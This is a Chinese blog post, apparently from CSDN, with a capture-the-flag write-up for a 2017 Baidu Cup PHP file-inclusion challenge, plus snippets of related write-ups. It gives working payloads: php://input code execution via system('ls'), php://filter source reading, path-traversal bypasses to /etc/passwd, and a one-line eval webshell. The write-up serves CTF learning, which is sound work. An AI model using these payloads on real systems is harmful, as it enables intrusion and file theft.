ctf-wp-百度杯CTF比赛 2017 二月场 include

最新推荐文章于 2024-08-14 21:58:30 发布
最新推荐文章于 2024-08-14 21:58:30 发布
阅读量1.2k 收藏
点赞数 2
分类专栏: ctf-wp 文章标签: ctf writeup 百度杯 include
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/key_nothing/article/details/82908739
版权

考察文件包含
打开题目:发现 allow_url_include on
在这里插入图片描述
直接构造?path=php://input
post参数<?php echo system('ls');?>列出文件名看看:
在这里插入图片描述
发现有个奇怪的文件:dle345aae.php
查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后再解码。
构造语句:

?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

在这里插入图片描述
解码:
在这里插入图片描述
bingo

zc01@
关注
专栏目录
百度CTF比赛 2017 二月--Zone
Oavinci的博客
05-17 676
提示未登录 BP抓包修改login=1,成功登录 点击manage抓包,修改login=1,返回包中发现有个302页面跳转 尝试访问系统配置文件 GET /manages/admin.php?module=/etc/passwd&name= 无回显 GET /manages/admin.php?module=../../../etc/passwd&name= 无回显 怀疑过滤了../ 尝试用..././ GET /manages/admin.php?modul...
百度CTF比赛2017年2月WP--web
Oavinci的博客
06-02 991
一、爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于“李华”。就是说,你可以通过这个全局数组来访问任何一个变量,所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。 审计代码可以知道,我们可以用GET传值方式?hello=...
百度CTF比赛 2017 二月 没错!就是文件包含漏洞。
weixin_30586085的博客
03-27 293
题目源码: 文件包含漏洞的话,看一下 你么可以使用php://input 伪协议,执行代码(参考了大佬WP)这里使用了POSTMAN, 目录下还有一个dle345aae.php文件,呢么用cat命令打开,并且输出文件内容(反单引号在linux中表示命令) 还有一种方法是用php://filter(php伪协议,作为中间流可以读取)直接读取dle3456aae.php...
wkctf比赛wp-[pwn]
最新发布
x528935893的博客
08-14 623
3、但是这样我们就破坏了堆的结构,这样的后果就是我们没法再malloc chunk了,所以我们需要修复chunk的结构,我们需要修复两个地方,一个是main_arena+88的位置,一个是unsort bin中chunk的fb和bk。2、show函数只能泄露8个字节,我们可以使用unsort bin attack ,将我们的chunk_list中的一个地址链上一个堆地址,然后show就可以泄露堆地址了。我们查看代码逻辑,发现存在一个格式化字符串漏洞,然后我们通过调试,发现我们输入两个数字,只会去第一个。
---“百度CTF比赛 2017 二月---------------include
qq_43182466的博客
04-26 283
ctrl+f查找allow_url_include ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190426220537866.png 可以构造?path=php://input 发现有个奇怪的文件名,访问它<?php echo 'cat dle345aae.php'?>出不来,但是看writeup上上条语句可以得到flag ...
百度CTF比赛 2017 二月_onthink
a173262565的博客
04-07 300
题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数 百度找到onethinnk的一个漏洞。 参考:http://www.hackdig.com/06/hack-36510.htm 就是注册个账号为: %250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号...
百度CTF比赛 2017 二月 Zone
feng的博客
09-12 687
这是涉及burp抓包,文件包含或者文件读取,目录遍历,和nginx的配置文件的一个题目。
百度CTF比赛 九月 Web-Login
qq_34106499的博客
01-17 647
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
i春秋 web“百度CTF比赛 九月-Upload & code
ChanCherry的博客
10-13 1004
百度CTF比赛 九月Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
CTF逆向-[SUCTF2018]babyre-WP-cpp简单迭代并按表输出值的爆破
serfend's blog
04-13 2068
CTF逆向-[SUCTF2018]babyre-WP-cpp简单迭代并按表输出值的爆破 来源:https://buuoj.cn/ 内容:https://github.com/hebtuerror404/CTF_competition_warehouse_2018 附件:链接:https://pan.baidu.com/s/1j-DBK5eELYR3c1L6hhB1qg?pwd=2kxh 提取码:2kxh 答案:SUCTF{Flag_8i7244980f} 总体思路 去除反调试,动调 发现没有逻辑分支,发现
百度CTF比赛 九月——Code
Ifish的博客
08-07 2665
题目描述 解题思路 1、打开题目链接,看到url,感觉应该是文件包含 查看源码,看到了图片的base64编码 2、感觉思路比较清晰,构造 index.php?jpg=index.php,查看源码,得到base64编码,解码,得到index.php的源码 &amp;lt;?php /** * Created by PhpStorm. * Date: 2015/11/16...
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
百度CTF比赛 2017 二月 Zone
u011250160的博客
04-06 249
使用dirseatch扫描敏感目录 绕过登录 返回的页面中有个Manage 访问Manage 发现返回中有admin.php?module=index&name=php 访问 /manages/admin.php?module=index&name=php /manages/admin.php?module=in../dex&name=php 它俩返回的页面是一样的 说明过滤了../ 使用..././绕过 发现 访问nginx的配置文件 发现:include sites-e
i春秋 “百度CTF比赛 2017 二月 Web writeup
Senimo
03-28 1261
i春秋 “百度CTF比赛 2017 二月 Web writeup爆破-1爆破-2爆破-3includeZoneOneThink 爆破-1 分值:10分 类型:MiscWeb 题目内容:flag就在某六位变量中。 启动靶机,打开题目: 进入页面为一段源码,分析代码: 包含flag.php文件 需要传入变量hello的值 正则表达式匹配:一个或多个[A-Za-z0-9_] var_dump(...
[Reverse] - 百度CTF比赛 2017 二月-CrackMe-1
123
08-17 1506
环境:Windows XP 工具: IDA OD EXEINFOPE 0x00 查壳 0x01 分析 拖入OD,字符串查找看一看。 跟进去看就可以知道关键call了 0040196A . 48 dec eax 0040196B . 0F85 C4000000 jnz CrackMe1.00401A35 00401971 . B8...
百度CTF比赛 2017 二月 文件包含漏洞 writeup
u011250160的博客
09-24 273
1:利用php://input协议查看当前目录下的文件 2:利用php://filter/read=convert.base64-encode/resource=dle345aae.php查看dle345aae.php文件的内容 3:base64解码得到flag
百度CTF比赛 2017 二月--web 爆破-2 writeup
会下雪的晴天
06-14 584
题目描述 解题思路 点击链接得到以下代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 尝试将hello变为全局变量(GOLBALS) 在URL后加?hello=$GOLBALS 结果: 得到FLAG 由第一步可知,flag不在...
百度CTF比赛 2017 二月——Web-爆破-3
大方子
08-27 696
================================== 个人收获: 1.php中MD5()计算数组会返回null如果用==0则为真   ==================================     题目: 主要是代码审计,大家可以自己百度下都能看得懂的,这里我就直说关键的部分   关键部分代码在这 if($_SESSION['whoami'...
百度CTF比赛 2017 二月 include
SPS98
11-05 607
题目说的很明确, 直接告诉说是文件包含漏洞, 看了下分值感觉应该没有什么套路
利用Volatility进行内存取证:CTF-陇剑实战指南
在"CTF-陇剑之内存分析-虚拟机内存取证1"这篇文章中,主要介绍了如何使用内存取证工具Volatility进行虚拟机内存分析。Volatility是一个开源的内存取证框架,它特别适用于分析内存镜像,帮助用户深入理解系统运行时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值